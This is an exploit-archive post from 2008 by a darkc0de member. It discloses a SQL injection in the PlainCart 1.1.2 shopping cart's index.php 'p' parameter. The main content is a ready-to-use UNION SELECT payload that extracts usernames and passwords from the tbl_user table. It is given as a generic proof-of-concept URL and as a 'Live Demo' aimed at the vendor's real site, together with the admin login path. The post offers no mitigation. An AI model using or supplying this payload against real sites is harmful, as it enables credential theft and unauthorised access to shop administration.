[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Plaincart 1.1.2 (p) Remote SQL Injection Vulnerability
# Published : 2008-09-20
# Author : r45c4l
# Previous Title : Diesel Pay Script (area) Remote SQL Injection Vulnerability
# Next Title : Oceandir <= 2.9 (show_vote.php id) Remote SQL Injection Vulnerability
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: PlainCart (index.php) SQL Inj
#
# Script Download: http://www.phpwebcommerce.com/shopping-cart-source-code.php
#
#
###########################################################
#
# d0rk: n/a
#
###########################################################
POC 1:-
http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
Live Demo:
http://www.phpwebcommerce.com/plaincart/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
Admin panel: www.site.com/plaincart/admin/login.php
###########################################################
#
# Bug discovered : 20 Sep.2008
###########################################################
# www.Syue.com [2008-09-20]